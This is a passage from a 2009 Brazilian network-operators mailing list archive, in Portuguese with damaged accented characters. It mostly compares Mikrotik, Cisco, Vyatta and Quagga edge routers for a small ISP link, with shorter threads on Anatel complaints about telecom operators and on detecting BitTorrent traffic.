laptop. Find the PC that?s right for you. http://www.microsoft.com/windows/choosepc/?ocid=ftp_val_wl_290 From Bruno at Openline.com.br Sat Jun 6 23:17:50 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Sat, 06 Jun 2009 23:17:50 -0300 Subject: [GTER] roteador de borda Message-ID: <1244341070613.Bruno@Openline.com.br> Ol? O STM-1 que citou vai receber em ethernet ou em ATM? Se for ATM essa discuss?o sobre mikrotik/linux/freebsd se torna in?cua... --- Marconi Pereira escreveu: > Opa Bruno, valeu pela dica! Eu acompanho a lista h? um tempo e ainda n?o vi threads esculhambando o mikrotik. ihhh esse ? o tipo de afirma??o que pode gerar um flame war :~) > Pelo visto ? um equipamento bastante confi?vel e utilizado em instala??es cr?ticas. Poder?amos afirmar, nesse caso, que Microtik tem o mesmo n?vel de confiabilidade que um cisco? Eu n?o falei isso, a essa conclus?o voc? chegou sozinho! > trabalhei muitos anos com cisco e eu sempre dormi em paz. Considero que o mikrotik ? uma solu??o que vale o pre?o que pede, mas lembre-se que ningu?m nunca foi demitido por comprar cisco, ibm/dell/hp ou mico$oft... ainda mais em miss?o critica!!! Mesmo quem usa mikrotik pesado reconhece algumas limita??es (mem?ria, necessidade de rodar em PC se a carga "apertar", algumas vers?es "muito beta" da s?rie 3.x etc.) - aceita-se essas limita??es em fun??o do fator custo e da disponibilidade de profissionais que saibam como "contornar" alguns desses problemas Obviamente o mikrotik tem melhorado a cada vers?o. E mesmo o IOS apresenta bugs de tempos em tempos. > Sendo bem minimalista, a curva de aprendizado, instala??o, manuten??o, suporte e upgrade (ROI, pra ser mais pr?tico) do Mikrotik ? menor ou maior que o equipamento Cisco sugerido por voc?? O grupo de pessoas que usa mikrotik em miss?o critica a cada dia tem aumentado, como pode acompanhar nos depoimentos aqui mesmo na lista (voc? lembra do bug do AS de 32 bits que derrubou muitos ciscos no mundo uns meses atr?s? o causador foi um... mikrotik), mas ainda existem muitos profissionais com CCNA da cisco disponiveis no mercado, o que pode ser uma vantagem dependendo da cidade onde est? No caso do mikrotik n?o conhe?o nenhum curso avan?ado MESMO, voc? vai ter que aprender quase que sozinho (como eu fiz ali?s), testando ou ainda nos f?runs estrangeiros (alguma lista sober mikrotik no brasil? a masoch-l n?o me parece apropriada, mas posso estar enganado). Isso pode ser um problema (mas tamb?m seria se escolher linux+quagga ou freebsd+openbgp) Esse ? ali?s O problema do juniper / junos. Quando estavamos comparando um Juniper s?rie J x um cisco 7200 x a rb1000 os fatores curva de aprendizado e a limita??o de n?mero de profissionais conhecedores do sistema em nossa regi?o pesaram muito na decis?o (o custo tamb?m, obviamente) Ent?o vou inverter a pergunta: voc? tem grana para um cisco 7200 com processador NPH-1G? estamos falando de uns R$30 mil (usado) e bem mais que isso (novo)... j? a rb1000 custa R$2500 com nota aqui mesmo no BR. e um ibm/dell/hp como o proliant j? citado custa por volta disso e pode rodar tanto freebsd quanto linux (al?m do pr?prio mikrotik, caso resolva testar com ele) > []sM. []s, !3runo Cabral From Bruno at Openline.com.br Sat Jun 6 23:25:14 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Sat, 06 Jun 2009 23:25:14 -0300 Subject: [GTER] roteador de borda Message-ID: <1244341514762.Bruno@Openline.com.br> --- "Bruno at Openline.com.br" escreveu: > (voc? lembra do bug do AS de 32 bits que derrubou muitos > ciscos no mundo uns meses atr?s? o causador foi um... mikrotik), me corrigindo, bug do as-path longo. o bug do AS de 32 bits derrubou foi o quagga 0.99.x (e o vyatta community edition) []s, !3runo From rubensk at gmail.com Sun Jun 7 01:00:50 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Sun, 7 Jun 2009 01:00:50 -0300 Subject: [GTER] roteador de borda In-Reply-To: <1244341514762.Bruno@Openline.com.br> References: <1244341514762.Bruno@Openline.com.br> Message-ID: <6bb5f5b10906062100t45c3ca10o4f3f565fe685cc1d@mail.gmail.com> > --- "Bruno at Openline.com.br" escreveu: >> (voc? lembra do bug do AS de 32 bits que derrubou muitos >> ciscos no mundo uns meses atr?s? o causador foi um... mikrotik), > > me corrigindo, bug do as-path longo. o bug do AS de 32 bits > derrubou foi o quagga 0.99.x (e o vyatta community edition) Bruno, Voc? provavelmente pensou neste epis?dio: http://www.renesys.com/blog/2009/02/longer-is-not-better.shtml Nele, algu?m configurou um AS-prepending muito grande num Mikrotik, e com isso derrubou v?rios Cisco pelo mundo. Bug nas duas plataformas, independente de qual caiu. Rubens From rubensk at gmail.com Sun Jun 7 01:18:43 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Sun, 7 Jun 2009 01:18:43 -0300 Subject: [GTER] roteador de borda In-Reply-To: <1244341070613.Bruno@Openline.com.br> References: <1244341070613.Bruno@Openline.com.br> Message-ID: <6bb5f5b10906062118p407644a7o201a2c22debc5327@mail.gmail.com> > No caso do mikrotik n?o conhe?o nenhum curso avan?ado MESMO, voc? > vai ter que aprender quase que sozinho (como eu fiz ali?s), testando > ou ainda nos f?runs estrangeiros (alguma lista sober mikrotik no > brasil? a masoch-l n?o me parece apropriada, mas posso estar enganado). > Isso pode ser um problema (mas tamb?m seria se escolher linux+quagga > ou freebsd+openbgp) A MASOCH-L ? sim apropriada para essas discuss?es, mas observo mais gente discutindo sobre Mikrotik em f?runs como Under Linux(http://under-linux.org/forums/). V?rios dos usu?rios frequentes desse f?rum s?o tamb?m posters na GTER e na MASOCH-L, ent?o a possibilidade de termos boas discuss?es na MASOCH-L existe. Gostaria de registrar a minha decep??o com o qu?o pouco o pessoal da Let?nia que desenvolve o Mikrotik responde aos pr?prios f?runs, refor?ando seu alerta sobre as quest?es de suporte que envolvem o produto. Rubens From gustkiller at gmail.com Sat Jun 6 22:54:43 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Sat, 6 Jun 2009 22:54:43 -0300 Subject: [GTER] RES: RES: roteador de borda In-Reply-To: <001b01c9e6fc$a86506b0$f92f1410$@com> References: <5B42F6C6B43E4AC28C60AF0FF0EA4266@SUporteHerlon> <276fbe8b0906050455s5cd330bamfcaea10a4d78a06e@mail.gmail.com> <45C59D91582E40F2AEB3A622C0789A7C@toledoPC> <276fbe8b0906051055h5a788e7cme53467f1ab5a35c3@mail.gmail.com> <001b01c9e6fc$a86506b0$f92f1410$@com> Message-ID: <276fbe8b0906061854t3ec71ee9sede50345ef4dd8c2@mail.gmail.com> 100% pelo menos nunca tive problemas... ( mais de um ano utilizando este processador) 2009/6/6 Antonio Junior > Mas o HP ML 110 o processador ? Intel xeon. O mikrotik ? compat?vel com > essa > fam?lia de processador? > > Att, > > Antonio Junior > > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em > nome de Gustavo Santos > Enviada em: sexta-feira, 5 de junho de 2009 14:55 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] RES: roteador de borda > > HP ML 110 G5 ( mais barato e mais eficiente) com interfaces hp intel > gigabit > pci-express. > Eu me decepcionei um pouco com a rb1000 quando se utiliza centenas de > queues > e filtros. > > 2009/6/5 Toledo, Luis Carlos > > > RB1000 ? > > > > > -----Mensagem original----- > > > De: gter-bounces at eng.registro.br > > > [mailto:gter-bounces at eng.registro.br] Em nome de Gustavo Santos > > > Enviada em: sexta-feira, 5 de junho de 2009 08:56 > > > Para: Herlon Alcantara Matos; Grupo de Trabalho de Engenharia > > > e Operacao de Redes > > > Assunto: Re: [GTER] roteador de borda > > > > > > Aqui, dois Mikrotiks com 155Mbits redundantes por vrrp. > > > > > > 2009/6/4 Herlon Alcantara Matos > > > > > > > Eu utilizo Vyatta. > > > > > > > > O Vyatta no meu caso com volume de trafego em torno de 30 MB ? > > > > altamente estavel, interface simples e para uma quantidade desta de > > > > link em uma maquina com boas placas de rede , > > > preferencialmente INTEL, > > > > voc? ira trabalhar tranquilamente. > > > > > > > > > > > > Herlon > > > > LCI Telecom > > > > > > > > > > > > > > > > -- > > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From gustkiller at gmail.com Sat Jun 6 22:56:01 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Sat, 6 Jun 2009 22:56:01 -0300 Subject: [GTER] RES: roteador de borda In-Reply-To: <1244332746577.Bruno@Openline.com.br> References: <1244332746577.Bruno@Openline.com.br> Message-ID: <276fbe8b0906061856x494ca36eh920ca6b6c3262bbb@mail.gmail.com> 2009/6/6 Bruno at Openline.com.br > --- Gustavo Santos escreveu: > > > MPLS ajuda a n?o passar pela parte IP do kernel... provavelmente a > > > utiliza??o combinada de L2 ou raw-L3 desse o mesmo efeito que voc? > > > teve com o MPLS. Se voc? associar outros ganhos do MPLS conforme o MT > > > for implementando (TE, FRR, L3 VPN) a? sim vai fazer diferen?a. > > > > Estou a princ?pio a marca??o de pacotes para defini??o de Classes > > de Servi?o (CoS). Testei o L3 VPN (performance muito superior ao EoIP) > > s? falta um pouco de tempo para testar os TE Tunnels. > > voc? j? tentou os tuneis do MT com um PC (linux ou freebsd) do outro lado? Bruno, s? tuneis com pptp e l2tp. o EoIP ? "propriet?rio do MK" > > > []s, !3runo Cabral > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From gustkiller at gmail.com Sat Jun 6 23:06:22 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Sat, 6 Jun 2009 23:06:22 -0300 Subject: [GTER] roteador de borda In-Reply-To: References: <1244332276986.Bruno@Openline.com.br> Message-ID: <276fbe8b0906061906q72fde8dbh143a614455076743@mail.gmail.com> 2009/6/6 Marconi Pereira > > Opa Bruno, valeu pela dica!Eu acompanho a lista h? um tempo e ainda n?o vi > threads esculhambando o mikrotik. Pelo visto ? um equipamento bastante > confi?vel e utilizado em instala??es cr?ticas. Poder?amos afirmar, nesse > caso, que Microtik tem o mesmo n?vel de confiabilidade que um cisco? > trabalhei muitos anos com cisco e eu sempre dormi em paz. > Sendo bem minimalista, a curva de aprendizado, instala??o, manuten??o, > suporte e upgrade (ROI, pra ser mais pr?tico) do Mikrotik ? menor ou maior > que o equipamento Cisco sugerido por voc?? > []sM. Me intrometendo um pouco j? que a pergunta foi direcionada, mas n?o custa nada postar experi?ncias. Voc? tendo os fundamentos de rede bem fixados , a curva de aprendizado ? bem r?pida para comecar a usar. Uma coisa que tem que se tomar cuidado ? que muita gente acha que por ter uma interface gr?fica bastante amigavel ? mais f?cil fazer besteira do que em um Cisco devido a so clicar para fazer praticamente tudo ou acabar com tudo:) ( Coisa que em um cisco se vc n?o tiver ideia do comando voc? n?o consegue nem executa-lo.) O ROI ? excelente , quanto custaria um Cisco para o no nosso caso com praticamente mais de 350mbits de tr?fego agregado de "internet" O uptime s? ? zerado quando existe algum upgrade importante com novas funcionalidades ( A ultima vers?o por exemplo liberou estatisticas de erro de interfaces e uma corre??o importante para que usa mais de 1 processador/n?cleo). O grande segredo n?o so do mikrotik como dos outros roteadores baseados em software a principio ? a escolha do hardware que vai rodar, escolhendo um hardware confiavel e para os que realmente querem que "Dormir" o custo de 2 em redund?ncia sai mais em conta e ao meu ver chega a ser t?o confiavel quanto um cisco que custa dezenas de vezes mais. > > > > > ---------------------------------------- > > From: Bruno at Openline.com.br > > To: gter at eng.registro.br > > Date: Sat, 6 Jun 2009 20:51:16 -0300 > > Subject: Re: [GTER] roteador de borda > > > > Ol? > > > > --- Marconi Pereira escreveu: > >> Caros, > >> estou pesquisando sobre solu??o de roteador de borda para link entre > >> 100 e 155Mbps. > >> > >> 1-qual roteador Cisco adequado (alguem tem ideia do preco do equip + > IOS?); > > > > Um Cisco 7200 com NPH-1G deve conseguir 200M > > > >> 2-Vyatta? (eh estavel, eh facil de configurar, tem algum feature de > QoS?) > > > > O vyatta community edition teve um problema recente de bug no quagga > > com ASN de 32 bits que deixou v?rias pessoas "fora" at? surgir uma > > solu??o. a vers?o paga me parece que teve resposta r?pida > > > >> 3-servidor dell com quagga? (nao rodo BGP, mas pode surgir a > necessidade) > > > > ou freebsd com openbgd? > > > > eu uso aqui com sucesso Mikrotik rodando em RB1000 com tr?fego > > agregado de 200M e CPU com folga. BGP full com 2 peers e 2 > > com parcial. muita gente torce o nariz, mas eu peguei o projeto > > andando e ... tem funcionado a contento > > > >> Obrigado, > >> M. > > > > []s, !3runo Cabral > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > _________________________________________________________________ > Lauren found her dream laptop. Find the PC that?s right for you. > http://www.microsoft.com/windows/choosepc/?ocid=ftp_val_wl_290 > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From marconipp at hotmail.com Sun Jun 7 00:00:17 2009 From: marconipp at hotmail.com (Marconi Pereira) Date: Sun, 7 Jun 2009 03:00:17 +0000 Subject: [GTER] roteador de borda In-Reply-To: <1244341070613.Bruno@Openline.com.br> References: <1244341070613.Bruno@Openline.com.br> Message-ID: Vem por fast ethernet mesmo.Please, no flame wars! :-)Eu cheguei a essa conclus?o sobre o mikrotik porque os depoimentos a favor s?o maiores que as reclama??es. Mas foi uma conclus?o infantil realmente.O JunOS n?o tem similaridade de conceitos com o IOS? Quem administra um Cisco n?o ? capaz de fazer o mesmo no Juniper? Achei que os CLIs fossem bastante similares... Esse 7200 ? uma geladeira? Quantas u's no rack? Po, por 30 mil eu opto por um gerador pra minha opera??o inclu?do QTA e i?amento por guindaste. De repente, ? uma trazer esse cisco dos EUA. O mikrotik q voc? cita ? um apliance? posso rodar tanto como apliance quanto colocar uma placa num server? O que realmente me preocupa ? a complexidade do equipo. N?o adianta economizar no mikrotik e tomar ferro em consultoria e suporte...[]sM. ---------------------------------------- > From: Bruno at Openline.com.br > To: gter at eng.registro.br > Date: Sat, 6 Jun 2009 23:17:50 -0300 > Subject: Re: [GTER] roteador de borda > > Ol? > > O STM-1 que citou vai receber em ethernet ou em ATM? Se for ATM > essa discuss?o sobre mikrotik/linux/freebsd se torna in?cua... > > --- Marconi Pereira escreveu: >> Opa Bruno, valeu pela dica! Eu acompanho a lista h? um tempo e ainda n?o vi > threads esculhambando o mikrotik. > > ihhh esse ? o tipo de afirma??o que pode gerar um flame war :~) > >> Pelo visto ? um equipamento bastante confi?vel e utilizado em instala??es > cr?ticas. Poder?amos afirmar, nesse caso, que Microtik tem o mesmo n?vel de > confiabilidade que um cisco? > > Eu n?o falei isso, a essa conclus?o voc? chegou sozinho! > >> trabalhei muitos anos com cisco e eu sempre dormi em paz. > > Considero que o mikrotik ? uma solu??o que vale o pre?o que pede, > mas lembre-se que ningu?m nunca foi demitido por comprar cisco, > ibm/dell/hp ou mico$oft... ainda mais em miss?o critica!!! > > Mesmo quem usa mikrotik pesado reconhece algumas limita??es (mem?ria, > necessidade de rodar em PC se a carga "apertar", algumas vers?es > "muito beta" da s?rie 3.x etc.) - aceita-se essas limita??es em > fun??o do fator custo e da disponibilidade de profissionais que > saibam como "contornar" alguns desses problemas > > Obviamente o mikrotik tem melhorado a cada vers?o. E mesmo o IOS > apresenta bugs de tempos em tempos. > >> Sendo bem minimalista, a curva de aprendizado, instala??o, manuten??o, > suporte e upgrade (ROI, pra ser mais pr?tico) do Mikrotik ? menor ou maior > que o equipamento Cisco sugerido por voc?? > > O grupo de pessoas que usa mikrotik em miss?o critica a cada dia > tem aumentado, como pode acompanhar nos depoimentos aqui mesmo > na lista (voc? lembra do bug do AS de 32 bits que derrubou muitos > ciscos no mundo uns meses atr?s? o causador foi um... mikrotik), > mas ainda existem muitos profissionais com CCNA da cisco disponiveis > no mercado, o que pode ser uma vantagem dependendo da cidade onde est? > > No caso do mikrotik n?o conhe?o nenhum curso avan?ado MESMO, voc? > vai ter que aprender quase que sozinho (como eu fiz ali?s), testando > ou ainda nos f?runs estrangeiros (alguma lista sober mikrotik no > brasil? a masoch-l n?o me parece apropriada, mas posso estar enganado). > Isso pode ser um problema (mas tamb?m seria se escolher linux+quagga > ou freebsd+openbgp) > > Esse ? ali?s O problema do juniper / junos. Quando estavamos > comparando um Juniper s?rie J x um cisco 7200 x a rb1000 os fatores > curva de aprendizado e a limita??o de n?mero de profissionais > conhecedores do sistema em nossa regi?o pesaram muito na decis?o > (o custo tamb?m, obviamente) > > Ent?o vou inverter a pergunta: voc? tem grana para um cisco 7200 > com processador NPH-1G? estamos falando de uns R$30 mil (usado) e > bem mais que isso (novo)... j? a rb1000 custa R$2500 com nota > aqui mesmo no BR. e um ibm/dell/hp como o proliant j? citado > custa por volta disso e pode rodar tanto freebsd quanto linux > (al?m do pr?prio mikrotik, caso resolva testar com ele) > >> []sM. > > []s, !3runo Cabral > > -- > gter list https://eng.registro.br/mailman/listinfo/gter _________________________________________________________________ Insert movie times and more without leaving Hotmail?. http://windowslive.com/Tutorial/Hotmail/QuickAdd?ocid=TXT_TAGLM_WL_HM_Tutorial_QuickAdd_062009 From herbert at scw.net.br Sun Jun 7 02:12:12 2009 From: herbert at scw.net.br (Herbert Faleiros) Date: Sun, 7 Jun 2009 02:12:12 -0300 Subject: [GTER] roteador de borda In-Reply-To: <6bb5f5b10906062118p407644a7o201a2c22debc5327@mail.gmail.com> References: <1244341070613.Bruno@Openline.com.br> <6bb5f5b10906062118p407644a7o201a2c22debc5327@mail.gmail.com> Message-ID: <200906070212.12177.herbert@scw.net.br> On Sun 07 Jun 2009 01:18:43 Rubens Kuhl wrote: > Gostaria de registrar a minha decep??o com o qu?o pouco o pessoal da > Let?nia que desenvolve o Mikrotik responde aos pr?prios f?runs, > refor?ando seu alerta sobre as quest?es de suporte que envolvem o > produto. Bom, olha s? isso aqui (do f?rum oficial do MK): normis (Staff) Location: Riga, Latvia Total posts: 7642 5.18% of all posts sergejs (Staff) Location: Riga, Latvia Total posts: 3921 2.66% of all posts Sobre suporte, precisei uma ?nica vez (de forma oficial) e foram muito sol?citos e r?pidos (na verdade nem suporte foi, era uma d?vida sobre o suporte a um NIC esdr?xulo). -- Herbert From gustkiller at gmail.com Sun Jun 7 02:21:37 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Sun, 7 Jun 2009 02:21:37 -0300 Subject: [GTER] roteador de borda In-Reply-To: <200906070212.12177.herbert@scw.net.br> References: <1244341070613.Bruno@Openline.com.br> <6bb5f5b10906062118p407644a7o201a2c22debc5327@mail.gmail.com> <200906070212.12177.herbert@scw.net.br> Message-ID: <276fbe8b0906062221v38a7be73ncde05155a5fd8d83@mail.gmail.com> O suporte via e-mail abrindo ticket normalmente ? r?pido. 2009/6/7 Herbert Faleiros > On Sun 07 Jun 2009 01:18:43 Rubens Kuhl wrote: > > Gostaria de registrar a minha decep??o com o qu?o pouco o pessoal da > > Let?nia que desenvolve o Mikrotik responde aos pr?prios f?runs, > > refor?ando seu alerta sobre as quest?es de suporte que envolvem o > > produto. > > > Bom, olha s? isso aqui (do f?rum oficial do MK): > > normis (Staff) > Location: Riga, Latvia > > Total posts: 7642 > 5.18% of all posts > > sergejs (Staff) > Location: Riga, Latvia > > Total posts: 3921 > 2.66% of all posts > > > Sobre suporte, precisei uma ?nica vez (de forma oficial) e foram muito > sol?citos e r?pidos (na verdade nem suporte foi, era uma d?vida sobre o > suporte a um NIC esdr?xulo). > > -- > Herbert > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From Bruno at openline.com.br Sun Jun 7 07:29:15 2009 From: Bruno at openline.com.br (Bruno at openline.com.br) Date: Sun, 07 Jun 2009 07:29:15 -0300 Subject: [GTER] RES: RES: roteador de borda Message-ID: <1244370555203.Bruno@openline.com.br> Ola O Mikrotik roda em x86 em geral (intel, amd, geode, c3 etc.), mas algumas vers?es da s?rie 3.x tem problemas com multicore Recomenda-se sempre testar em bancada antes de tentar um upgrade de produ??o []s !3runo Cabral --- Gustavo Santos escreveu: > 100% pelo menos nunca tive problemas... ( mais de um ano utilizando este processador) > > 2009/6/6 Antonio Junior > > Mas o HP ML 110 o processador ? Intel xeon. O mikrotik ? compat?vel com essa fam?lia de processador? > > > > Att, > > Antonio Junior > > > > -----Mensagem original----- > > HP ML 110 G5 ( mais barato e mais eficiente) com interfaces hp intel gigabit pci-express. From Bruno at openline.com.br Sun Jun 7 07:44:17 2009 From: Bruno at openline.com.br (Bruno at openline.com.br) Date: Sun, 07 Jun 2009 07:44:17 -0300 Subject: [GTER] roteador de borda Message-ID: <1244371457588.Bruno@openline.com.br> Ol? --- Marconi Pereira escreveu: > O JunOS n?o tem similaridade de conceitos com o IOS? O "show run" do JunOS parece com "C". O vyatta e o openbgp tamb?m parecem um pouco com o JunOS. J? o quagga parece mais com o IOS > Quem administra um Cisco n?o ? capaz de fazer o mesmo no Juniper? Achei que os CLIs fossem bastante similares... Tem uma curva de aprendizado em qq sistema novo. O problema ? que o custo de um curso de JunOS ? muito, mais muito superior que o equivalente do IOS (me cobraram US$5k na ?poca que cotamos a s?rie J) > Esse 7200 ? uma geladeira? Quantas u's no rack? n?o ? muito grande, pesquise no ML pra ver fotos > O mikrotik q voc? cita ? um apliance? Mikrotik RouterOS ? um software baseado em linux, com CLI pr?pria assim como interface gr?fica (winbox, mas roda no wine tb), que roda em x86 ou em placas Routerboard (MIPS e PowerPC) A RB1000 ? um appliance. Veja mais em www.routerboard.com > posso rodar tanto como apliance quanto colocar uma placa num server? Pode instalar no server (? um S.O.) > O que realmente me preocupa ? a complexidade do equipo. N?o adianta economizar no mikrotik e tomar ferro em consultoria e suporte...[]sM. O curso de Mikrotik do Maia da www.mikrotikbrasil.com.br ? barato e de boa qualidade, mas s? arranha a parte mais avan?ada. Mesmo assim vale a pena nem que seja s? para conhecer o sistema. []s, !3runo Cabral From Bruno at openline.com.br Sun Jun 7 08:09:57 2009 From: Bruno at openline.com.br (Bruno at openline.com.br) Date: Sun, 07 Jun 2009 08:09:57 -0300 Subject: [GTER] roteador de borda Message-ID: <1244372997009.Bruno@openline.com.br> --- Rubens Kuhl escreveu: > Gostaria de registrar a minha decep??o com o qu?o pouco o pessoal da > Let?nia que desenvolve o Mikrotik responde aos pr?prios f?runs, > refor?ando seu alerta sobre as quest?es de suporte que envolvem o > produto. Secundo esse sentimento, tenho v?rious supout enviados at? agora sem resposta ("embromation"?) por problemas em vers?es "muito beta" da 3.x na RB1000. Porisso digo: sempre teste em bancada antes de upgrade em campo! J? suporte brazuca (pago) que possa fazer alguma coisa (al?m de "fa?a upgrade/downgrade para a vers?o X") na descoberta de bugs reais tamb?m n?o existe (em linux/freebsd voc? pelo menos tem acesso aos fontes para aplicar um patch, no MK n?o) Pessoalmente me sinto mais a vontade com listas de discuss?o que em f?runs web. Infelizmente parece que l? fora ? o contr?rio :~) (n?o participo do f?rum web do under-linux) !3runo Cabral From Bruno at Openline.com.br Sun Jun 7 08:27:48 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Sun, 07 Jun 2009 08:27:48 -0300 Subject: [GTER] RES: roteador de borda Message-ID: <1244374068718.Bruno@Openline.com.br> --- Gustavo Santos escreveu: > > > Testei o L3 VPN (performance muito superior ao EoIP) > > > s? falta um pouco de tempo para testar os TE Tunnels. > > > > voc? j? tentou os tuneis do MT com um PC do outro lado? > > Bruno, s? tuneis com pptp e l2tp. o EoIP ? "propriet?rio do MK" IPIP me parece que ? compativel, j? a "senha" do EoIP (que na verdade ? um tunel GRE) me parece com o c?digo de tunel GRE do linux (falta tempo para testar esse) Mas estava me referindo aos tuneis novos que o Rubens citou, como esse L3 VPN []s, !3runo Cabral From gustavo.albuquerque at gmail.com Sun Jun 7 11:15:47 2009 From: gustavo.albuquerque at gmail.com (Andre Gustavo de C. Albuquerque) Date: Sun, 7 Jun 2009 11:15:47 -0300 Subject: [GTER] roteador de borda In-Reply-To: References: <1244341070613.Bruno@Openline.com.br> Message-ID: 2009/6/7 Marconi Pereira > > Esse 7200 ? uma geladeira? Quantas u's no rack? Depende do modelo. Existem op??es com 1 e 3 RUs. Veja http://www.cisco.com/en/US/products/hw/routers/ps341/prod_models_comparison.html Pra quem quer apenas GE ou FE, o 7201 deve bastar. A p?gina da fam?lia se encontra em http://www.cisco.com/go/7200 H? tamb?m o ASR1000, para quem precisa de maior desempenho que o 7200. Existem op??es de 2, 4 ou 6 RUs atualmente. Veja quadro resumo em http://www.cisco.com/en/US/products/ps9343/prod_models_comparison.html A p?gina da fam?lia se encontra em http://www.cisco.com/go/asr1000 Um abra?o, Gustavo Albuquerque From gustkiller at gmail.com Sun Jun 7 11:03:20 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Sun, 7 Jun 2009 11:03:20 -0300 Subject: [GTER] RES: roteador de borda In-Reply-To: <1244374068718.Bruno@Openline.com.br> References: <1244374068718.Bruno@Openline.com.br> Message-ID: <276fbe8b0906070703p28c55938h6a9ead39f2e50287@mail.gmail.com> Sobre o Mpls l3 vpn n?o :( 2009/6/7 Bruno at Openline.com.br > --- Gustavo Santos escreveu: > > > > Testei o L3 VPN (performance muito superior ao EoIP) > > > > s? falta um pouco de tempo para testar os TE Tunnels. > > > > > > voc? j? tentou os tuneis do MT com um PC do outro lado? > > > > Bruno, s? tuneis com pptp e l2tp. o EoIP ? "propriet?rio do MK" > > IPIP me parece que ? compativel, j? a "senha" do EoIP (que > na verdade ? um tunel GRE) me parece com o c?digo de tunel > GRE do linux (falta tempo para testar esse) > > Mas estava me referindo aos tuneis novos que o Rubens citou, > como esse L3 VPN > > []s, !3runo Cabral > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From pfrancezi at gmail.com Sun Jun 7 09:40:40 2009 From: pfrancezi at gmail.com (Patricia Francezi) Date: Sun, 7 Jun 2009 09:40:40 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: <1244333786010.Bruno@Openline.com.br> References: <1244333786010.Bruno@Openline.com.br> Message-ID: <34ffca6b0906070540u3f757493s43b6c26c3b1da7ce@mail.gmail.com> Lendo isso, e juntando com um exemplo recente de um colega (pessoa fisica) penso que tudo que o Proteste est? falando sobre a Anatel (de ser ineficiente) est? correto... Precisamos de exemplos pra entender o falat?rio.... 2009/6/6 Bruno at Openline.com.br > --- =?ISO-8859-1?Q?Rodrigo_Melga=E7o_Alves?= > escreveu: > > Sempre que ultrapassa o prazo determinado de solu??o de um problema > > abrimos uma reclama??o na Anatel e ? comum a reclama??o na Anatel ser > > fechada incorretamente pela CTBC como: "defeito ? no cliente e n?o na > > CTBC" ou "j? est? resolvido" > > Isso ? bastante comum na Embratel e na OI. Aqui at? j? desenvolvemos > um "m?todo" para tratar esse problema. No 5o dia ?til de cada > reclama??o n?s ligamos NO FINAL DO EXPEDIENTE para a ag?ncia e > informamos que n?o obtivemos contato com a operadora e que o problema > continua > > Mesmo se estiver fechado, o ticket ? reaberto por nossa reclama??o > > E repetimos o processo de 5 em 5 dias at? a solu??o do problema > > Usualmente em 60 dias mais ou menos o ?ndice da reclama??o dispara > e a tele finalmente conserta o problema > > O que vejo ? descaso por parte da ag?ncia quanto aos casos. Ela n?o > liga para confirmar a informa??o da operadora. E essa de dar mais 5 dias > de prazo (por ex. tem servi?os que tem 2 dias de prazo, se n?o fez em > 5 ent?o deveria ser PADO _NA HORA_ tal qual querem fazer com > empresas de SCM, e n?o empurrar com a barriga o caso) ? uma afronta > ao direito do consumidor - j? esperei mais de 60 dias por solu??es > simples como mudan?a de endere?o de linha telef?nica, imagine quem > assina contrato de link e espera de 6 meses a 2 anos pela instala??o?! > > []s, !3runo Cabral > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From Bruno at Openline.com.br Sun Jun 7 12:38:44 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Sun, 07 Jun 2009 12:38:44 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica Message-ID: <1244389124488.Bruno@Openline.com.br> --- Patricia Francezi escreveu: > Lendo isso, e juntando com um exemplo recente de um colega (pessoa fisica) > penso que tudo que o Proteste est? falando sobre a Anatel (de ser > ineficiente) est? correto... > Precisamos de exemplos pra entender o falat?rio.... http://www.wirelessbrasil.org/flavia_lefevre/blog_01.html []s, !3runo Cabral From herbert at scw.net.br Sun Jun 7 13:04:22 2009 From: herbert at scw.net.br (Herbert Faleiros) Date: Sun, 7 Jun 2009 13:04:22 -0300 Subject: [GTER] RES: RES: roteador de borda In-Reply-To: <1244370555203.Bruno@openline.com.br> References: <1244370555203.Bruno@openline.com.br> Message-ID: <200906071304.22870.herbert@scw.net.br> On Sun 07 Jun 2009 07:29:15 Bruno at openline.com.br wrote: > O Mikrotik roda em x86 em geral (intel, amd, geode, c3 etc.), mas algumas > vers?es da s?rie 3.x tem problemas com multicore O ?nico que nunca testei dos que citou acima foi o Via. SMP foi introduzido em x86 com a s?rie 3. Sobre os problemas com SMP o ?nico que notei (fiquei alguns releases sem atualizar por conta desse ainda BUG) resolveram na 3.18 (fast clock), ou seja, desaconselho usar x86 com SMP em releases entre 14 e 18 (s?rie 3). -- Herbert From lgranja at gmail.com Sun Jun 7 18:10:42 2009 From: lgranja at gmail.com (Luiz Henrique G. Granja) Date: Sun, 7 Jun 2009 17:10:42 -0400 Subject: [GTER] Log de P2P In-Reply-To: <1244333873536.Bruno@Openline.com.br> References: <1244333873536.Bruno@Openline.com.br> Message-ID: <31d2512c0906071410m12921a04y322c0d3f906e6d6a@mail.gmail.com> Bruno, o que pode-se fazer ? colocar o SNORT e analisar de onde vem o P2P. Eu aconselho a colocar um host (maquina) em modo bridge e levantar estas informa??es. []'s Luiz Granja 2009/6/6 Bruno at Openline.com.br > --- Rafael Henrique Faria escreveu: > > Estamos com um problema na identifica??o do uso de programas P2P, mais > > precisamente no protocolo Bittorrent. > > > > Temos diversos usu?rios 